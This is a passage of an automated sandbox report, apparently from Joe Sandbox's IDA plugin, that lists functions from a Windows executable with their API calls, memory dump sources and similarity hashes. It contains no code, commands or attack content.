                                                                                                                Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                • String ID:
                                                                                                                • API String ID: 3985565216-0
                                                                                                                • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                                • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                                Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                Function 0041696E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                                                                • TlsGetValue.KERNEL32(00000005,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004169C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                • Opcode ID: f1787378902819e9947f97c0fd6b8d9b320c13b2552bb88f8caa1f2ac1665e6d
                                                                                                                • Instruction ID: e5bba5b00aa6f8354d24bce9220d26f317535e3d8edc7be22519ce0301cf3cdb
                                                                                                                • Opcode Fuzzy Hash: f1787378902819e9947f97c0fd6b8d9b320c13b2552bb88f8caa1f2ac1665e6d
                                                                                                                • Instruction Fuzzy Hash: 4CF0C2B0210111AF8F209B35DD449EF3A98AF403657064437FC1DD62A0DB38DC81C79D
                                                                                                                Function 004169E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                                                                • TlsGetValue.KERNEL32(00000005,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A28
                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00416A43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                • Opcode ID: 0b3d26fac8f7b222a059dde4d81d242a9bd92865164bd8a543a794d3b2e1d27d
                                                                                                                • Instruction ID: 6b6853f7d3ee3eb9e65f39b7335b34cb1b7d5f0f3521d7c85aee421bb533db53
                                                                                                                • Opcode Fuzzy Hash: 0b3d26fac8f7b222a059dde4d81d242a9bd92865164bd8a543a794d3b2e1d27d
                                                                                                                • Instruction Fuzzy Hash: 65F04430600115AB8B209B75DD44ADF3F99AF423E0715843BFC18E62A0EB38DD41879C
                                                                                                                Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                • API String ID: 2574300362-3261711971
                                                                                                                • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                Function 00464A0E Relevance: 9.3, APIs: 6, Instructions: 281networkmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWidegethostbynameinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 867222529-0
                                                                                                                • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3220332590-0
                                                                                                                • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                Function 00422806 Relevance: 9.2, APIs: 6, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(00000001,004832AC,00000001,?,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?,?,?), ref: 00422835
                                                                                                                • GetLastError.KERNEL32(?,004229F0,00000001,?,?,?,?,?,?,?,?,00000001,?,?,?,00000001), ref: 00422847
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?), ref: 004228AC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,00000001,?,?,?,00000001,?), ref: 00422916
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00422924
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?,?), ref: 00422999
                                                                                                                  • Part of subcall function 0042540D: GetCPInfo.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00425458
                                                                                                                  • Part of subcall function 0042540D: GetCPInfo.KERNEL32(00000000,00000001,?,?,?,0041D4AE,00000000,00000000,?), ref: 00425471
                                                                                                                  • Part of subcall function 0042540D: MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,?,00000000,?,?,?,?,?,?,0041D4AE,00000000,00000000,?), ref: 0042551E
                                                                                                                  • Part of subcall function 0042540D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$StringType$Info$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2250435928-0
                                                                                                                • Opcode ID: 773a929a23efa12b5da778aefeae380a86b05995ea6eda526da0bbf57dde95d5
                                                                                                                • Instruction ID: 0f324d561209b13029d01e9070866e268b39bf3e2f15ac4abc19e924a9dc5289
                                                                                                                • Opcode Fuzzy Hash: 773a929a23efa12b5da778aefeae380a86b05995ea6eda526da0bbf57dde95d5
                                                                                                                • Instruction Fuzzy Hash: E751A27170022ABFDF10AF64ED819AF3BA9FB04754F90052BF910D6250D6B9CDA0DB98
                                                                                                                Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                • SendInput.USER32 ref: 0044C6E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2221674350-0
                                                                                                                • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                Function 0047762A Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • GetMenu.USER32 ref: 004776AA
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItemStringWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2847105600-0
                                                                                                                • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4189319755-0
                                                                                                                • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 3368777196-0
                                                                                                                • Opcode ID: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                • Opcode Fuzzy Hash: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
